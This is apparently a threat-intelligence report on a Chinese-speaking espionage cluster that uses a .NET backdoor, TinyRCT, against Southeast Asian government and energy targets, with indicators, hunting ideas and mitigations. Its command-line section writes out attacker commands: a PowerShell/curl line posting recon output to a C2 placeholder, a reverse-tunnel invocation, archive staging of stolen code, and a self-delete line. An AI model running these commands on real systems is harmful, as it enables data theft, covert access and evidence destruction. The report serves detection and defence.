CL-STA-1062 Targets Southeast Asian Governments and Critical Infrastructure
CL-STA-1062, a Chinese-speaking threat cluster assessed to be the same as UAT-7237, has compromised Southeast Asian government and critical energy infrastructure entities throughout 2025 using web shell deployment, MSSQL data exfiltration, and open-source tunneling tools (SoftEther VPN, VNT, yuze). The group has introduced TinyRCT, a previously undocumented .NET backdoor delivered via AppDomainManager Injection (malicious chrome_setup.zip), which uses AES-CBC encrypted HTTP C2, sandbox-evasion path checks, scheduled-task persistence disguised as legitimate updater services, and a self-destruct routine using choice.exe for anti-forensic file deletion.
- filenamechrome_setup.zipMalicious archive used as initial infection vector delivering the AppDomainManager Injection chain
- filenamePerfWatson2.exeTinyRCT backdoor disguised as legitimate Microsoft Visual Studio telemetry component
- ip139[.]180[.]134[.]211Alternate IP referenced in image showing sdksdk608 tool-hosting paths (may be same infrastructure, differs from .221 by one digit)
- ip139[.]180[.]134[.]221Staging server hosting PerfWatson2.exe (TinyRCT) payload and secondary tool archives
- ip202[.]182[.]102[.]5Destination for exfiltrated reconnaissance output (whoami, ipconfig, domain admin group) via curl/PowerShell
- ip45[.]32[.]113[.]172TinyRCT backdoor C2 server used for beaconing and command/data exchange
- ip45[.]76[.]210[.]43C2 server for reverse tunnel connection via tool disguised as XDRAgent.exe
- sha25600e09754526d0fe836ba27e3144ae161b0ecd3774abec5560504a16a67f0087cchrome_setup.zip - malicious archive delivering AppDomainManager Injection loader
- sha2564e1f8888d020decd09799ec946f1bf677cac6612b24582ddbf4d8ede425d8384TinyRCT backdoor binary (PerfWatson2.exe)
- sha2569b481b69cd91b09fa7bae7428f646dd89473a4c03393e43da81fe756cde1c472VNT tunneling tool disguised as VMware executable
- sha256cbfe8de6ffadbb1d396f61e63eb18e8b11c29527c1528641e3223d4c516cf7c3TinyRCT downloader (MyAppDomainManager.dll loader)
- sha256dce5df29bddff5a4ddaea5c4fec14da91f7b69063a6e1c45ed61e5da4fc6c87bSoftEther VPN binary disguised as vmtools.exe for tunneling
- sha256f34bd1d485de437fe18360d1e850c3fd64415e49d691e610711d8d232071a0b1fscan reconnaissance tool used by CL-STA-1062
Detection / HunterAnthropic
What Happened
Security researchers discovered that a Chinese-speaking hacking group has been breaking into government offices and energy companies (power/utility organizations) in Southeast Asia throughout 2025, stealing database records and source code. The affected organizations are primarily government agencies and state-owned energy companies in the region. This matters because the attackers built a brand-new, previously unseen hacking tool (a 'backdoor,' meaning software that lets them remotely control an infected computer, steal files, and take screenshots) and disguised it and their other tools as legitimate software like Chrome installers, VMware, and Microsoft/Google update services to avoid detection. Organizations, especially in critical infrastructure and government sectors in Southeast Asia, should review the technical indicators shared in this report, check for the described suspicious files and network connections, and strengthen monitoring of unusual scheduled tasks and outbound connections to unfamiliar servers.
Key Takeaways
- CL-STA-1062, a Chinese-speaking threat cluster active since at least March 2022, is assessed with high confidence to be the same group as Cisco Talos' UAT-7237, expanding operations from Taiwan into Southeast Asian government and energy sector targets in 2025.
- The group introduced a previously undocumented .NET backdoor, TinyRCT, featuring AES-encrypted C2, file exfiltration, screen capture, and a self-destruct/anti-forensic routine.
- Initial access leverages AppDomainManager Injection via a malicious chrome_setup.zip archive, abusing a legitimate signed executable paired with a malicious .config file to load a rogue DLL and evade detection.
- Attackers use sandbox-evasion checks (validating execution path from %LOCALAPPDATA% or %USERPROFILE%\Downloads) and disguise tools (SoftEther VPN, VNT) as legitimate files like vmtools.exe or XDRAgent.exe.
- Persistence is established via scheduled tasks masquerading as legitimate update services (e.g., GoogleUpdaterTaskSystem, MicrosoftEdgeUpdate) configured to run with highest privileges at logon.
Affected Systems
- Windows endpoints and servers
- MSSQL database servers
- Government entity web servers (ASPX-based)
- State-owned critical energy infrastructure (CEI) networks in Southeast Asia
Attack Chain
Initial access begins with a malicious chrome_setup.zip archive containing a legitimate signed chrome_setup.exe, a malicious chrome_setup.exe.config, and MyAppDomainManager.dll, exploiting AppDomainManager Injection so the .NET runtime loads the malicious DLL when the user runs the trusted executable. After validating it is running from %USERPROFILE%\Downloads (evading sandboxes), the loader downloads a secondary payload (PerfWatson2.exe, the TinyRCT backdoor) from a staging server, saves it to %LOCALAPPDATA%, and creates a scheduled task (GoogleUpdaterTaskSystem...) to run it at every logon with highest privileges. TinyRCT fingerprints the host, registers with an AES-CBC-encrypted HTTP POST to its C2, then beacons every 10 seconds via GET/POST for commands including shell execution, file exfiltration (gzip-compressed, AES-encrypted, 40KB chunks), screen capture, and self-destruct (which removes the scheduled task and self-deletes the executable via a choice.exe-timed batch command). In parallel, other intrusions use web shells to enable command execution and reconnaissance, exfiltrate database contents via osql.exe, stage stolen files with WinRAR, and deploy disguised tunneling tools (SoftEther VPN, VNT, yuze) alongside credential theft (Mimikatz) and privilege escalation (JuicyPotato) for lateral movement and prolonged access.
Detection Availability
- YARA Rules: No
- Sigma Rules: No
- Snort/Suricata Rules: No
- KQL Queries: No
- Splunk SPL Queries: No
- EQL Queries: No
- Other Detection Logic: No
- Platforms: Cortex XDR, Advanced WildFire, Advanced URL Filtering, Advanced DNS Security
The article does not publish standalone YARA/Sigma/Snort/KQL/SPL/EQL rule bodies; instead it states that Palo Alto Networks Cortex XDR/XSIAM, Advanced WildFire, Advanced URL Filtering, and Advanced DNS Security have been updated with protections and detections (e.g., Behavioral Threat Protection blocking TinyRCT execution, as shown in a product screenshot) based on the indicators shared in this research.
Detection Engineering Assessment
EDR Visibility: High — The malware performs distinctive process/path-validation checks, scheduled task creation, and self-deletion via choice.exe, all of which are observable through endpoint process creation, file system, and scheduled task telemetry captured by modern EDR agents. Network Visibility: Medium — C2 traffic uses standard HTTP with AES-encrypted payloads, which would appear as generic HTTP GET/POST beaconing; network detection would rely on identifying anomalous beacon intervals, unusual URIs, or known C2 IP/domain reputation rather than payload content inspection. Detection Difficulty: Moderate — While individual techniques (scheduled task persistence, AppDomainManager Injection, disguised binaries) are detectable via behavioral rules, the group's use of legitimate-looking filenames, signed executables, and encrypted C2 traffic increases evasion against signature-only defenses; sandbox-evasion checks also complicate automated dynamic analysis.
Required Log Sources
- Windows Process Creation logs (Sysmon Event ID 1 / Event ID 4688)
- Scheduled Task creation/deletion logs (Event ID 4698/4699/4700/4701)
- Network connection logs / proxy logs (outbound HTTP to unusual IPs)
- File creation/modification logs in %LOCALAPPDATA% and Downloads directories
- PowerShell script block logging (Event ID 4104)
- DNS query logs
- Web server access logs for web shell activity
Hunting Hypotheses
| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
|---|---|---|---|
| Look for .NET executables launching from user Downloads or AppData\Local directories that spawn or load DLLs matching an AppDomainManager configuration pattern shortly after execution. | Process creation events, module/DLL load events, file creation timestamps | Initial Access / Execution (T1574.014) | Low-Medium; legitimate applications occasionally use custom AppDomainManagers, but the combination with a newly-dropped config file adjacent to a signed executable is uncommon |
| Hunt for scheduled tasks created with names mimicking legitimate update services (e.g., containing 'GoogleUpdater' or 'MicrosoftEdgeUpdate') that point to binaries in ProgramData or AppData rather than standard installation paths. | Scheduled task creation logs, task action/binary path fields | Persistence (T1053.005) | Low; legitimate update tasks typically reference vendor-signed paths in Program Files, not user-writable directories |
| Consider monitoring for outbound HTTP beaconing with regular short intervals (e.g., ~10 seconds) to external IPs from processes not typically associated with network activity (e.g., binaries named after telemetry components). | Network connection logs, proxy/firewall logs, EDR network module | Command and Control (T1071.001) | Medium; legitimate telemetry/update agents also beacon periodically, requiring correlation with process reputation |
| Search for use of choice.exe combined with a delete command targeting an executable in AppData\Local, indicating a self-deletion/anti-forensic technique. | Command-line logging, Sysmon Event ID 1 | Defense Evasion (T1070.004) | Low; this specific combination is rarely used in legitimate software |
| Identify PowerShell or curl invocations that pipe output of reconnaissance commands (whoami, ipconfig, net group) directly to an external IP via HTTP POST. | PowerShell script block logging, command-line auditing, network logs | Discovery / Exfiltration (T1016, T1069.002) | Low; direct exfiltration of recon output via curl POST to raw IPs is atypical of normal administrative activity |
Control Gaps
- Signature-based antivirus alone is unlikely to catch TinyRCT due to its custom, previously undocumented nature and disguise as legitimate filenames
- Network-layer inspection relying on payload content will be ineffective against AES-encrypted C2 traffic
- Basic file reputation checks may fail against legitimate signed executables abused via AppDomainManager Injection
- Sandbox/dynamic analysis environments may be evaded due to explicit path-validation checks built into both the loader and the backdoor
Key Behavioral Indicators
- Process execution path validation from unusual expected locations (%LOCALAPPDATA%, Downloads) tied to sandbox-evasion behavior
- Presence of a .config file alongside a legitimate signed executable enabling non-standard DLL loading
- Scheduled tasks with names imitating legitimate update services but pointing to non-standard install paths
- Use of choice.exe with a timed delay preceding file deletion of the same process's own binary
- Executables masquerading as VMware, XDR agent, or browser installer components performing outbound network connections
- Regular short-interval HTTP beaconing (~10 seconds) from non-browser processes
False Positive Assessment
- Medium - individual indicators such as scheduled task creation, PowerShell/curl usage, and RAR archive extraction are common in legitimate IT operations; correlation with specific IOCs (hashes, C2 IPs, disguised filenames) and behavioral context (e.g., path-validation evasion, choice.exe self-deletion) is necessary to reduce false positives.
Recommendations
Immediate Mitigation
- Verify against your organization's incident response runbook and team escalation paths before acting; if the indicators in this report (IPs, hashes, filenames) are found in your environment, consider isolating affected hosts if your EDR supports host isolation.
- Consider blocking outbound network traffic to the reported C2 IP addresses at the firewall/proxy level, pending verification these are still active.
- Consider searching endpoint and network logs for the reported file hashes, filenames (PerfWatson2.exe, chrome_setup.zip), and scheduled task names to identify potential compromise.
- If a match is found, consider preserving forensic artifacts before remediation, as the malware includes a self-destruct/anti-forensic capability.
Infrastructure Hardening
- Evaluate whether web application firewalls and regular patching processes are in place to reduce web shell deployment risk on internet-facing government/energy applications.
- Consider restricting execution of unsigned or newly-downloaded executables from user-writable directories (Downloads, AppData\Local, ProgramData) via application control policies (e.g., AppLocker, WDAC) where feasible.
- Evaluate network segmentation between government/energy operational networks and general corporate IT to limit lateral movement opportunities identified via reconnaissance (e.g., traceroute, net group queries).
- Consider auditing and restricting outbound connections from servers to unfamiliar destination IPs, particularly on ports associated with tunneling tools.
User Protection
- Consider deploying behavioral/EDR protections capable of detecting AppDomainManager Injection patterns and scheduled task abuse, if not already enabled.
- Evaluate whether endpoint controls flag or block execution of RAR/ZIP archives containing paired legitimate executables and unexpected .config files.
- Consider monitoring for and alerting on disguised tool execution (e.g., binaries named vmtools.exe, vmwared.exe, XDRAgent.exe) that do not match expected vendor hashes or installation paths.
Security Awareness
- Consider reinforcing user awareness around downloading and executing installer packages (e.g., 'chrome_setup') from untrusted sources or links.
- Evaluate whether staff in government and energy sector organizations receive periodic briefings on regionally-targeted threat activity such as CL-STA-1062/UAT-7237.
- Consider incorporating recognition of suspicious scheduled task names and unexpected update-related processes into IT/helpdesk training programs.
MITRE ATT&CK Mapping
- T1574.014 - Hijack Execution Flow: AppDomainManager
- T1071.001 - Application Layer Protocol: Web Protocols
- T1573.001 - Encrypted Channel: Symmetric Cryptography
- T1053.005 - Scheduled Task/Job: Scheduled Task
- T1005 - Data from Local System
- T1113 - Screen Capture
- T1041 - Exfiltration Over C2 Channel
- T1560.001 - Archive Collected Data: Archive via Utility
- T1105 - Ingress Tool Transfer
- T1518.001 - Software Discovery: Security Software Discovery
- T1070.004 - Indicator Removal: File Deletion
- T1090 - Proxy (Tunneling tools such as SoftEther VPN, VNT, yuze)
- T1003 - OS Credential Dumping (Mimikatz)
- T1068 - Exploitation for Privilege Escalation (JuicyPotato)
- T1505.003 - Server Software Component: Web Shell
- T1082 - System Information Discovery
- T1016 - System Network Configuration Discovery
- T1069.002 - Permission Groups Discovery: Domain Groups
Additional IOCs
- Ips:
139[.]180[.]134[.]211- Alternate IP referenced in image showing sdksdk608 tool-hosting paths (may be same infrastructure, differs from .221 by one digit)
- Urls:
hxxp://139[.]180[.]134[.]221/sdksdk608/1.zip- Tool archive hosted on attacker staging serverhxxp://139[.]180[.]134[.]221/sdksdk608/anydesk%5f0117.zip- AnyDesk-related archive hosted on attacker staging serverhxxp://139[.]180[.]134[.]221/sdksdk608/hamcore.se2- SoftEther VPN component hosted on attacker staging serverhxxp://139[.]180[.]134[.]221/sdksdk608/httpdf- fscan tool hosted on attacker staging serverhxxp://139[.]180[.]134[.]221/sdksdk608/vpn%5fbridge.config- SoftEther VPN bridge configuration file hosted on attacker staging serverhxxp://139[.]180[.]134[.]221/sdksdk608/win-vpn.rar- Password-protected RAR archive containing SoftEther VPN binary
- File Hashes:
f34bd1d485de437fe18360d1e850c3fd64415e49d691e610711d8d232071a0b1(SHA256) - fscan reconnaissance tool used by CL-STA-1062dce5df29bddff5a4ddaea5c4fec14da91f7b69063a6e1c45ed61e5da4fc6c87b(SHA256) - SoftEther VPN binary disguised as vmtools.exe for tunneling9b481b69cd91b09fa7bae7428f646dd89473a4c03393e43da81fe756cde1c472(SHA256) - VNT tunneling tool disguised as VMware executable
- File Paths:
d:\backup\web.rar- RAR archive used to stage stolen web server source code for exfiltrationd:\logfiles\XDRAgent.exe- Reverse tunnel tool disguised as legitimate XDR agent file, connects to C2C:\ProgramData\VMware\test2.rar- Password-protected RAR archive extracted to deploy SoftEther VPN binaryC:\ProgramData\VMware\test\vmtools.exe- SoftEther VPN binary masquerading as legitimate VMware Tools executableC:\ProgramData\VMware\vmwared.exe- VNT tunneling tool disguised as a VMware daemon executable, persisted via scheduled taskC:\Users\[User]\AppData\Local\PerfWatson2.exe- TinyRCT backdoor payload dropped to %LOCALAPPDATA% disguised as Visual Studio telemetry component
- Command Lines:
- Purpose: Exfiltrate database contents from a compromised MSSQL server to a local file for later exfiltration | Tools:
osql.exe,MSSQL| Stage: Collection / Exfiltration - Purpose: Compress stolen web server source code directory into a password-protected archive for staging | Tools:
WinRAR (rar.exe)| Stage: Collection / Staging |rar.exe a -k -r -s -m1 <archive.rar> <source_directory> - Purpose: Send reconnaissance command output (whoami, ipconfig, domain admin group membership) to an attacker-controlled server via HTTP POST | Tools:
PowerShell,curl| Stage: Discovery / Exfiltration |powershell "$cmd=(whoami);curl <C2>/ -Method POST -Body $cmd" - Purpose: Establish a reverse network tunnel from the victim host to an attacker-controlled server for C2/lateral movement | Tools:
Tunneling tool disguised as XDRAgent.exe| Stage: Command and Control |XDRAgent.exe reverse -c <ip:port> -u <user> -p <password> - Purpose: Extract and execute a password-protected RAR archive containing SoftEther VPN binary disguised as a VMware tool | Tools:
WinRAR,SoftEther VPN| Stage: Execution / Defense Evasion |rar.exe x -t -o -p <archive.rar> <output_dir> - Purpose: Create a scheduled task to run a tunneling tool disguised as a Windows update service with highest privileges at logon for persistence | Tools:
schtasks.exe,VNT (disguised as vmwared.exe)| Stage: Persistence - Purpose: Self-delete the TinyRCT malware executable after a delay to ensure the process has released its file handle, part of the anti-forensic self-destruct routine | Tools:
cmd.exe,choice.exe| Stage: Defense Evasion / Cleanup |cmd.exe /C choice /C Y /N /D Y /T 3 & Del <path_to_payload>
- Purpose: Exfiltrate database contents from a compromised MSSQL server to a local file for later exfiltration | Tools:
- Other:
GoogleUpdaterTaskSystem140.0.7272.0 {ACE7A46F-50FD-481C-AB32-3D838871DB40}- Scheduled task name created by TinyRCT loader for persistence, deleted during self-destruct routineMicrosoftEdgeUpdate- Scheduled task name used to persist a VNT tunneling tool disguised as vmwared.exe